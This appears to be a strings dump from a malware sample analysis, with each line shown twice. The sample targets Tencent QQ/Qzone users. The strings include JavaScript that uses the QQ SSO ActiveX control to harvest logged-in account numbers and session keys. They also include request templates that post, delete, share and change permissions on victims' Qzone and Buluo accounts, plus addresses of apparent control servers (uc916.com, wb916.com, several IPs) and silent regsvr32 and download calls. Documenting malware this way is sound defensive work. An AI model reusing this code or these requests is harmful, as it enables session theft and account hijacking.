return escapable.test(string) ? '"' string.replace(escapable, function (a) {
'\\u' ('0000' a.charCodeAt(0).toString(16)).slice(-4);
'\\u' ('0000' a.charCodeAt(0).toString(16)).slice(-4);
function str(key, holder) {
function str(key, holder) {
// Produce a string from holder[key].
// Produce a string from holder[key].
k, // The member key.
k, // The member key.
value = holder[key];
value = holder[key];
typeof value.toJSON === 'function') {
typeof value.toJSON === 'function') {
value = value.toJSON(key);
value = value.toJSON(key);
value = rep.call(holder, key, value);
value = rep.call(holder, key, value);
if (Object.prototype.toString.apply(value) === '[object Array]') {
if (Object.prototype.toString.apply(value) === '[object Array]') {
length = value.length;
length = value.length;
// Join all of the elements together, separated with commas, and wrap them in
// Join all of the elements together, separated with commas, and wrap them in
v = partial.length === 0 ? '[]' : gap ?
v = partial.length === 0 ? '[]' : gap ?
'[\n' gap partial.join(',\n' gap) '\n' mind ']' :
'[\n' gap partial.join(',\n' gap) '\n' mind ']' :
'[' partial.join(',') ']';
'[' partial.join(',') ']';
length = rep.length;
length = rep.length;
partial.push(quote(k) (gap ? ': ' : ':') v);
partial.push(quote(k) (gap ? ': ' : ':') v);
// Otherwise, iterate through all of the keys in the object.
// Otherwise, iterate through all of the keys in the object.
if (Object.prototype.hasOwnProperty.call(value, k)) {
if (Object.prototype.hasOwnProperty.call(value, k)) {
// Join all of the member texts together, separated with commas,
// Join all of the member texts together, separated with commas,
v = partial.length === 0 ? '{}' : gap ?
v = partial.length === 0 ? '{}' : gap ?
'{\n' gap partial.join(',\n' gap) '\n' mind '}' :
'{\n' gap partial.join(',\n' gap) '\n' mind '}' :
'{' partial.join(',') '}';
'{' partial.join(',') '}';
if (typeof JSON.stringify !== 'function') {
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
JSON.stringify = function (value, replacer, space) {
// that can replace values, or an array of strings that will select the keys.
// that can replace values, or an array of strings that will select the keys.
typeof replacer.length !== 'number')) {
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
throw new Error('JSON.stringify');
// Make a fake root object containing our value under the key of ''.
// Make a fake root object containing our value under the key of ''.
if (typeof JSON.parse !== 'function') {
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
JSON.parse = function (text, reviver) {
function walk(holder, key) {
function walk(holder, key) {
var k, v, value = holder[key];
var k, v, value = holder[key];
if (Object.prototype.hasOwnProperty.call(value, k)) {
if (Object.prototype.hasOwnProperty.call(value, k)) {
return reviver.call(holder, key, value);
return reviver.call(holder, key, value);
// Parsing happens in four stages. In the first stage, we replace certain
// Parsing happens in four stages. In the first stage, we replace certain
cx.lastIndex = 0;
cx.lastIndex = 0;
if (cx.test(text)) {
if (cx.test(text)) {
text = text.replace(cx, function (a) {
text = text.replace(cx, function (a) {
('0000' a.charCodeAt(0).toString(16)).slice(-4);
('0000' a.charCodeAt(0).toString(16)).slice(-4);
// We split the second stage into 4 regexp operations in order to work around
// We split the second stage into 4 regexp operations in order to work around
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {
.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {
// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
// In the optional fourth stage, we recursively walk the new structure, passing
// In the optional fourth stage, we recursively walk the new structure, passing
throw new SyntaxError('JSON.parse');
throw new SyntaxError('JSON.parse');
// These forms are obsolete. It is recommended that JSON.stringify and
// These forms are obsolete. It is recommended that JSON.stringify and
// JSON.parse be used instead.
// JSON.parse be used instead.
if (!Object.prototype.toJSONString) {
if (!Object.prototype.toJSONString) {
Object.prototype.toJSONString = function (filter) {
Object.prototype.toJSONString = function (filter) {
return JSON.stringify(this, filter);
return JSON.stringify(this, filter);
Object.prototype.parseJSON = function (filter) {
Object.prototype.parseJSON = function (filter) {
return JSON.parse(this, filter);
return JSON.parse(this, filter);
JSON.stringify(
JSON.stringify(
.push(
.push(
.map)'){
.map)'){
.splice(
.splice(
) {ary=ary key ','; }
) {ary=ary key ','; }
var ary=''; for (var key in
var ary=''; for (var key in
&password=
&password=
application/x-www-form-urlencoded
application/x-www-form-urlencoded
&softkey=
&softkey=
Content-Disposition: form-data; name="password"
Content-Disposition: form-data; name="password"
{pass}
{pass}
Content-Disposition: form-data; name="softkey"
Content-Disposition: form-data; name="softkey"
{softkey}
{softkey}
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
SetClientCertificate
SetClientCertificate
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
F%*.*f
F%*.*f
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
RASAPI32.dll
RASAPI32.dll
WinExec
WinExec
GetViewportOrgEx
GetViewportOrgEx
WINMM.dll
WINMM.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
WININET.dll
WININET.dll
CreateDialogIndirectParamA
CreateDialogIndirectParamA
GetViewportExtEx
GetViewportExtEx
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
:%d) |
:%d) |
%I64d%s
%I64d%s
:0{}%s
:0{}%s
:%d)%s
:%d)%s
.PAVCOleException@@
.PAVCOleException@@
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÃ
zcÃ
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
z>kernel32.dll
z>kernel32.dll
Comdlg32.dll
Comdlg32.dll
program internal error number is %d.
program internal error number is %d.
:"%s"
:"%s"
:"%s".
:"%s".
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
c:\windows\winhelp.ini
c:\windows\winhelp.ini
121.43.144.6
121.43.144.6
120.26.218.133
120.26.218.133
/udp.htm
/udp.htm
121.43.144.6|120.26.218.133
121.43.144.6|120.26.218.133
timwp.exe
timwp.exe
Timwp.dll
Timwp.dll
Timwp.dll"
Timwp.dll"
AppCom.dll
AppCom.dll
AppCom.dll"
AppCom.dll"
CPHelper.dll
CPHelper.dll
CPHelper.dll"
CPHelper.dll"
KernelUtil.dll
KernelUtil.dll
KernelUtil.dll"
KernelUtil.dll"
&fromSubId=1&subcmd=all&uin=
&fromSubId=1&subcmd=all&uin=
timwp.exe tencent://AddContact/?fromId=
timwp.exe tencent://AddContact/?fromId=
timwp.exe
timwp.exe
Common.dll
Common.dll
@`AMainFrame.dll
@`AMainFrame.dll
wAhXXp://list.uc916.com:7000/server/imin/list.txt?
wAhXXp://list.uc916.com:7000/server/imin/list.txt?
5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
urlmon
urlmon
gdi32.dll
gdi32.dll
URLDownloadToFileA
URLDownloadToFileA
=#>->5>=>
=#>->5>=>
;
;
1%1-161?1
1%1-161?1
3 3$3(3,30343@3
3 3$3(3,30343@3
c:\%original file name%.exe
c:\%original file name%.exe
(*.*)
(*.*)
1kmu.exe_3700:
.text
.text
`.rdata
`.rdata
@.data
@.data
diu2.iuG?iup
diu2.iuG?iup
CCmdTarget
CCmdTarget
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
COMCTL32.DLL
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
comdlg32.dll
comdlg32.dll
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
WINSPOOL.DRV
WINSPOOL.DRV
COMCTL32.dll
COMCTL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetCPInfo
GetCPInfo
SetWindowsHookExA
SetWindowsHookExA
GetKeyState
GetKeyState
UnhookWindowsHookEx
UnhookWindowsHookEx
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
qq.exe
qq.exe
.rsrc
.rsrc
t%SVh
t%SVh
t$(SSh
t$(SSh
~%UVW
~%UVW
u.hxHN
u.hxHN
u$SShe
u$SShe
kernel32.dll
kernel32.dll
ole32.dll
ole32.dll
shlwapi.dll
shlwapi.dll
Kernel32.dll
Kernel32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
ws2_32.dll
ws2_32.dll
oleaut32.dll
oleaut32.dll
OleAut32.dll
OleAut32.dll
atl.dll
atl.dll
Winhttp.dll
Winhttp.dll
wininet.dll
wininet.dll
WinHttpCheckPlatform
WinHttpCheckPlatform
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpOpen
WinHttpOpen
WinHttpConnect
WinHttpConnect
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpSetTimeouts
WinHttpSetTimeouts
WinHttpSetCredentials
WinHttpSetCredentials
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpSetOption
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReadData
WinHttpQueryHeaders
WinHttpQueryHeaders
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
WebBrowser
WebBrowser
socket_udp
socket_udp
120.55.106.30
120.55.106.30
120.55.148.93
120.55.148.93
.txt?
.txt?
hXXp://list.uc916.com:7000/server/qzone/
hXXp://list.uc916.com:7000/server/qzone/
\sdfDll.ini
\sdfDll.ini
\config.ini
\config.ini
154396063
154396063
(*^__^*)
(*^__^*)
hXXp://api.t.sina.com.cn/short_url/shorten.json?source=3213676317&url_long=
hXXp://api.t.sina.com.cn/short_url/shorten.json?source=3213676317&url_long=
[0].url_short
[0].url_short
hXXp://
hXXp://
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
ipaddress.wb916.com
ipaddress.wb916.com
/fs.aspx
/fs.aspx
{4590f811-1d3a-11d0-891f-00aa004b2e24}
{4590f811-1d3a-11d0-891f-00aa004b2e24}
{dc12a687-737f-11cf-884d-00aa004b2e24}
{dc12a687-737f-11cf-884d-00aa004b2e24}
hXXp://ipaddress.wb916.com/udp.htm
hXXp://ipaddress.wb916.com/udp.htm
120.55.106.30|120.55.148.93
120.55.106.30|120.55.148.93
|qqkey|
|qqkey|
SSOAxCtrlForPTLogin.SSOForPTLogin2
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
\npSSOAxCtrlForPTLogin.dll
\npSSOAxCtrlForPTLogin.dll
\SSOCommon.dll
\SSOCommon.dll
\SSOLUIControl.dll
\SSOLUIControl.dll
\SSOPlatform.dll
\SSOPlatform.dll
%System%\regsvr32.exe /s /u "
%System%\regsvr32.exe /s /u "
%System%\regsvr32.exe /s "
%System%\regsvr32.exe /s "
&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com&clientkey=
&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://ptlogin2.qq.com/jump?clientuin=
ptui_qlogin_CB('0', '
ptui_qlogin_CB('0', '
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?uin=
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_msglist_v6?uin=
msglist
msglist
].content
].content
msglist[
msglist[
].rt_uin
].rt_uin
].pic
].pic
].height
].height
].pic[
].pic[
].width
].width
].tid
].tid
p_skey=(.*?);
p_skey=(.*?);
http=
http=
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Adodb.Stream
Adodb.Stream
WinHttp
WinHttp
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_delete_v6?g_tk=
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_delete_v6?g_tk=
/311&hostuin=
/311&hostuin=
qzreferrer=http://user.qzone.qq.com/
qzreferrer=http://user.qzone.qq.com/
hXXp://w.qzone.qq.com/cgi-bin/right/set_entryright.cgi?g_tk=
hXXp://w.qzone.qq.com/cgi-bin/right/set_entryright.cgi?g_tk=
/profile/permit&flag=0x0&fupdate=1&uin=
/profile/permit&flag=0x0&fupdate=1&uin=
/profile/permit&flag=0x20101&fupdate=1&uin=
/profile/permit&flag=0x20101&fupdate=1&uin=
/profile/permit&flag=0x40000&fupdate=1&uin=
/profile/permit&flag=0x40000&fupdate=1&uin=
/profile/permit
/profile/permit
frameElement.callback(
frameElement.callback(
hXXp://w.qzone.qq.com/cgi-bin/right/set_revertright.cgi?g_tk=
hXXp://w.qzone.qq.com/cgi-bin/right/set_revertright.cgi?g_tk=
/profile/permit&fupdate=1&uin=
/profile/permit&fupdate=1&uin=
hXXp://user.qzone.qq.com/p/r/cgi-bin/tfriend/friend_show_qqfriends.cgi?uin=
hXXp://user.qzone.qq.com/p/r/cgi-bin/tfriend/friend_show_qqfriends.cgi?uin=
data.items
data.items
].uin
].uin
data.items[
data.items[
].name
].name
hXXp://union.uc916.com/zone/get
hXXp://union.uc916.com/zone/get
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_forward_v6?g_tk=
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_forward_v6?g_tk=
hXXp://union.uc916.com/zone/set
hXXp://union.uc916.com/zone/set
,nick:
,nick:
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_re_feeds?g_tk=
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_re_feeds?g_tk=
skey=
skey=
Content-Disposition: form-data; name="skey"
Content-Disposition: form-data; name="skey"
skey
skey
1.jpg
1.jpg
Content-Disposition: form-data; name="filename"; filename="1.jpg"
Content-Disposition: form-data; name="filename"; filename="1.jpg"
hXXp://shup.photo.qq.com/cgi-bin/upload/cgi_upload_image
hXXp://shup.photo.qq.com/cgi-bin/upload/cgi_upload_image
&special_url=&subrichtype=1&pic_bo=
&special_url=&subrichtype=1&pic_bo=
/311&syn_tweet_verson=1¶mstr=1&pic_template=&richtype=1&richval=
/311&syn_tweet_verson=1¶mstr=1&pic_template=&richtype=1&richval=
/311&syn_tweet_verson=1¶mstr=1&pic_template=tpl-
/311&syn_tweet_verson=1¶mstr=1&pic_template=tpl-
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
hXXp://taotao.qzone.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
https
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
HTTP/1.1
HTTP/1.1
hXXps://
hXXps://
hXXp://b1.qzone.qq.com/cgi-bin/blognew/add_blog?g_tk=
hXXp://b1.qzone.qq.com/cgi-bin/blognew/add_blog?g_tk=
&iNotice=1&inCharset=utf-8&outCharset=utf-8&format=fs&ref=qzone&json=1&g_tk=800267314&secverifykey=28Q1206
&iNotice=1&inCharset=utf-8&outCharset=utf-8&format=fs&ref=qzone&json=1&g_tk=800267314&secverifykey=28Q1206
qzreferrer=http://ctc.qzs.qq.com/qzone/newblog/v5/editor.html#opener=refererurl&source=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&cate=个人日记&title=
qzreferrer=http://ctc.qzs.qq.com/qzone/newblog/v5/editor.html#opener=refererurl&source=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&cate=个人日记&title=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_save?g_tk=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_save?g_tk=
&share2weibo=0&onekey=0&comment=0&entryuin=
&share2weibo=0&onekey=0&comment=0&entryuin=
qzreferrer=http://ctc.qzs.qq.com/qzone/app/qzshare/popup.html¬ice=1&fupdate=1&platform=qzone&token=1594827009&auto=0&type=blog&description=
qzreferrer=http://ctc.qzs.qq.com/qzone/app/qzshare/popup.html¬ice=1&fupdate=1&platform=qzone&token=1594827009&auto=0&type=blog&description=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareaddcomment?fupdate=2&g_tk=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareaddcomment?fupdate=2&g_tk=
&spaceuin=0&isfriend=1&uin=
&spaceuin=0&isfriend=1&uin=
qzreferrer=http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzsharegetmylistbytype?uin=
qzreferrer=http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzsharegetmylistbytype?uin=
hXXp://b11.qzone.qq.com/cgi-bin/blognew/add_comment?g_tk=
hXXp://b11.qzone.qq.com/cgi-bin/blognew/add_comment?g_tk=
&secverifykey=28Q1206
&secverifykey=28Q1206
&dprefix=&inCharset=gb2312&outCharset=gb2312&ref=qzone&page=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&uin=
&dprefix=&inCharset=gb2312&outCharset=gb2312&ref=qzone&page=1&refererurl=http%3A%2F%2Fctc.qzs.qq.com%2Fqzone%2Fapp%2Fblog%2Fv6%2Fbloglist.html%23nojump%3D1%26page%3D1%26catalog%3Dlist&uin=
&styledm=ctc.qzonestyle.gtimg.cn&imgdm=ctc.qzs.qq.com&bdm=b.qzone.qq.com&mode=2&numperpage=15×tamp=
&styledm=ctc.qzonestyle.gtimg.cn&imgdm=ctc.qzs.qq.com&bdm=b.qzone.qq.com&mode=2&numperpage=15×tamp=
&blogid=
&blogid=
qzreferrer=http://b11.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
qzreferrer=http://b11.qzone.qq.com/cgi-bin/blognew/blog_output_data?uin=
1970-01-01 08:00:00
1970-01-01 08:00:00
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=
hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareadd_url?g_tk=
&type=4&url=
&type=4&url=
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Referer: hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.ecyc.net?v0TPk3ocH5
Referer: hXXp://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://www.ecyc.net?v0TPk3ocH5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.7.1000 Chrome/30.0.1599.101 Safari/537.36
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.7.1000 Chrome/30.0.1599.101 Safari/537.36
Origin: hXXp://sns.qzone.qq.com
Origin: hXXp://sns.qzone.qq.com
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_timershuoshuo_v6?g_tk=
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_timershuoshuo_v6?g_tk=
&clientkey=
&clientkey=
&keyindex=9&pt_aid=715030901&daid=371&u1=http://buluo.qq.com/p/barindex.html?bid=
&keyindex=9&pt_aid=715030901&daid=371&u1=http://buluo.qq.com/p/barindex.html?bid=
ptui_qlogin_CB(
ptui_qlogin_CB(
&source=2&extparam={"client_type":4}&bkn=
&source=2&extparam={"client_type":4}&bkn=
Host: buluo.qq.com
Host: buluo.qq.com
Origin: hXXp://buluo.qq.com
Origin: hXXp://buluo.qq.com
X-Requested-With: XMLHttpRequest
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Referer: hXXp://buluo.qq.com/p/barindex.html?bid=230661
Referer: hXXp://buluo.qq.com/p/barindex.html?bid=230661
hXXp://buluo.qq.com/cgi-bin/bar/site/post/pub_rich_post
hXXp://buluo.qq.com/cgi-bin/bar/site/post/pub_rich_post
hXXp://captcha.qq.com/getimage?aid=716013036&v=0.
hXXp://captcha.qq.com/getimage?aid=716013036&v=0.
c:/teset.jpg
c:/teset.jpg
17004455
17004455
hXXp://buluo.qq.com/cgi-bin/bar/post/captcha/verify_v2
hXXp://buluo.qq.com/cgi-bin/bar/post/captcha/verify_v2
hXXp://union.uc916.com/zone/list
hXXp://union.uc916.com/zone/list
hXXp://buluo.qq.com/p/detail.html?bid=
hXXp://buluo.qq.com/p/detail.html?bid=
&like=1&source=2&extparam={"client_type":4}&r=0.
&like=1&source=2&extparam={"client_type":4}&r=0.
hXXp://buluo.qq.com/cgi-bin/bar/post/like
hXXp://buluo.qq.com/cgi-bin/bar/post/like
","pic_list":[{"url":"
","pic_list":[{"url":"
&coordinate=1&source=2&extparam={"client_type":4}&pid=
&coordinate=1&source=2&extparam={"client_type":4}&pid=
hXXp://buluo.qq.com/cgi-bin/bar/post/comment_v2
hXXp://buluo.qq.com/cgi-bin/bar/post/comment_v2
------WebKitFormBoundarya59o1fM4ajrut49e
------WebKitFormBoundarya59o1fM4ajrut49e
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Disposition: form-data; name="file"; filename="1.jpg"
------WebKitFormBoundarya59o1fM4ajrut49e--
------WebKitFormBoundarya59o1fM4ajrut49e--
Host: upload.buluo.qq.com
Host: upload.buluo.qq.com
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarya59o1fM4ajrut49e
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarya59o1fM4ajrut49e
Referer: hXXp://buluo.qq.com/buluoadmin/for-crossdomain.html
Referer: hXXp://buluo.qq.com/buluoadmin/for-crossdomain.html
hXXp://upload.buluo.qq.com/cgi-bin/bar/upload/image?callback=singleImgUpload
hXXp://upload.buluo.qq.com/cgi-bin/bar/upload/image?callback=singleImgUpload
url":"
url":"
hXXp://union.uc916.com/zone/del?userId=
hXXp://union.uc916.com/zone/del?userId=
c:\windows\iextadd.dat
c:\windows\iextadd.dat
\delext .bat
\delext .bat
var t=$.activetxsso,e=t.CreateTXSSOData();
var t=$.activetxsso,e=t.CreateTXSSOData();
t.InitSSOFPTCtrl(0,e);
t.InitSSOFPTCtrl(0,e);
var i=t.DoOperation(1,e);
var i=t.DoOperation(1,e);
for(var o=i.GetArray("PTALIST"),p=o.GetSize(),r=0;
for(var o=i.GetArray("PTALIST"),p=o.GetSize(),r=0;
var a=o.GetData(r),c=a.GetDWord("dwSSO_Account_dwAccountUin"),u=a.GetDWord("dwSSO_Account_dwAccountUin"),g="",d=a.GetByte("cSSO_Account_cAccountType"),h=c;
var a=o.GetData(r),c=a.GetDWord("dwSSO_Account_dwAccountUin"),u=a.GetDWord("dwSSO_Account_dwAccountUin"),g="",d=a.GetByte("cSSO_Account_cAccountType"),h=c;
g=a.GetArray("SSO_Account_AccountValueList"),h=g.GetStr(0)
g=a.GetArray("SSO_Account_AccountValueList"),h=g.GetStr(0)
m=a.GetWord("wSSO_Account_wFaceIndex")
m=a.GetWord("wSSO_Account_wFaceIndex")
_=a.GetStr("strSSO_Account_strNickName")
_=a.GetStr("strSSO_Account_strNickName")
